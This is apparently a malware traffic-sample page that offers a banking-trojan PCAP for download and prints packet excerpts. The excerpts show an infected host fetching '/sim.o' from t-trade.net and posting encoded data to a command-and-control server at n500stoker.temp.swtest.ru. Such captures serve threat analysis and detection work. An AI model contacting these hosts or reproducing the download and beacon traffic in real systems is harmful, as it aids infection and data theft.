Text Example

GET /sim.o t-trade.net Financial Stock Banking Malware Trojan PCAP file download sample

Download Attachments

  • 1 pcap simo
    Date added: May 30, 2019 7:55 am Added by: admin File size: 6 MB Downloads: 48

2019-05-29 21:16:12.610658 IP 10.1.10.162.60446 > 185.219.42.154.80: Flags [P.], seq 649603156:649603684, ack 3701990316, win 16425, length 528: HTTP: GET /sim.o HTTP/1.1
GET /sim.o HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=240615-
Unless-Modified-Since: Wed, 29 May 2019 23:56:47 GMT
If-Range: "10d200-58a0f88c11a17"
Host: t-trade.net
Connection: Keep-Alive

2019-05-29 21:16:36.990639 IP 10.1.10.162.60447 > 77.222.57.253.80: Flags [P.], seq 1839010927:1839011208, ack 1315819563, win 16425, length 281: HTTP: POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>
2019-05-29 21:16:37.647544 IP 77.222.57.253.80 > 10.1.10.162.60447: Flags [P.], seq 42341:43801, ack 281, win 237, length 1460: HTTP

2019-05-29 21:16:45.383337 IP 10.1.10.162.60448 > 77.222.57.253.80: Flags [P.], seq 4169006147:4169006321, ack 1258956205, win 16425, length 174: HTTP: POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 43590
Cache-Control: no-cache
